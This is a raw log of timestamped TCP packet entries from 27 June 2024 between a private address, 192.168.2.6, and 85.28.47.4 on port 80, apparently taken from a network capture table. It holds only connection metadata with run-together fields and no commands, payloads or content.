                                                                Jun 27, 2024 05:58:12.931967974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.931967974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.931987047 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932009935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932512999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932524920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932535887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932547092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932558060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932559967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932569981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932573080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932583094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932591915 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932595015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932607889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932617903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932619095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932631969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932642937 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932643890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932657003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932657957 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932670116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932682037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932684898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932696104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932708979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932710886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932720900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932725906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932734013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.932749033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.932774067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933464050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933482885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933495045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933506966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933516026 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933517933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933527946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933541059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933548927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933548927 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933552980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933563948 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933573008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933578014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933589935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933592081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933604956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933617115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933620930 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933628082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933640957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933641911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933653116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933660030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933665037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933679104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.933682919 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933701038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.933721066 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934403896 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934417009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934427977 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934438944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934449911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934457064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934463978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934477091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934480906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934480906 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934488058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934500933 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934513092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934525013 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934536934 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934540033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934540033 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934550047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934561968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934573889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934573889 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934586048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934592009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934598923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934611082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934612036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.934638023 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.934659004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.935179949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.935193062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.935204983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.935220003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.935226917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.935230017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:12.935262918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:12.935262918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.016537905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016557932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016570091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016591072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016601086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016612053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016623974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016633987 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.016670942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.016733885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016773939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.016809940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016822100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016856909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.016983986 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.016994953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017007113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017018080 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017029047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017034054 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017051935 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017066956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017110109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017168999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017199993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017213106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017224073 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017235041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017246008 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017246962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017255068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017282963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017468929 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017481089 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017492056 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017503023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017514944 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017518044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017527103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017546892 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017554045 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017560959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017568111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017577887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017590046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017597914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017601967 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017611980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017616034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017628908 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.017641068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017661095 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.017687082 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018022060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018066883 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018264055 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018275023 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018285990 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018297911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018309116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018310070 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018320084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018331051 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018335104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018349886 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018368006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018433094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018455982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018467903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018481016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018484116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018492937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018501997 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018505096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018517017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018527985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018531084 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.018551111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018564939 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.018999100 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019011021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019022942 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019033909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019043922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019046068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019054890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019066095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019073963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019077063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019088984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019093037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019098043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019109011 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019112110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019120932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019131899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019133091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019145966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019155979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019157887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019165039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019166946 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019179106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019191980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019195080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019220114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019237995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019859076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019870996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019882917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019901991 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019906044 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019907951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019920111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019932032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019941092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019943953 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019954920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019961119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019961119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.019965887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019978046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019989014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.019989967 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020001888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020013094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020025015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020025015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020025015 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020039082 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020049095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020050049 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020061016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020072937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020073891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020090103 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020111084 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020800114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020812988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020826101 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020837069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020848036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020849943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020859957 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020867109 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020872116 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020880938 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020883083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020895004 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020905972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020908117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020917892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020930052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020934105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020942926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020948887 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020955086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020966053 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020966053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020977974 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.020988941 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.020991087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.021023035 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.022114038 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.052989006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.058020115 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228188038 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228214979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228226900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228286028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228307009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228322983 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228362083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228387117 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228398085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228413105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228420973 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228449106 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228509903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228522062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228544950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228565931 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228595972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228607893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228631020 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228645086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228729010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228741884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228754044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228764057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228765965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228777885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.228796005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228796005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.228821993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229001999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229021072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229032040 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229038000 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229043961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229051113 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229055882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229065895 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229067087 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229078054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229085922 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229089022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229115009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229132891 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229510069 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229522943 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229533911 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229546070 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229557037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229568005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229579926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229592085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229603052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229614019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229624987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229635954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229646921 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229657888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229671955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.229717970 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.229770899 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230257034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230276108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230288982 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230300903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230304003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230312109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230324984 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230335951 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230340004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230348110 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230360031 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230370998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230370998 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:13.230382919 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:13.230391026 CEST4971180192.168.2.685.28.47.4
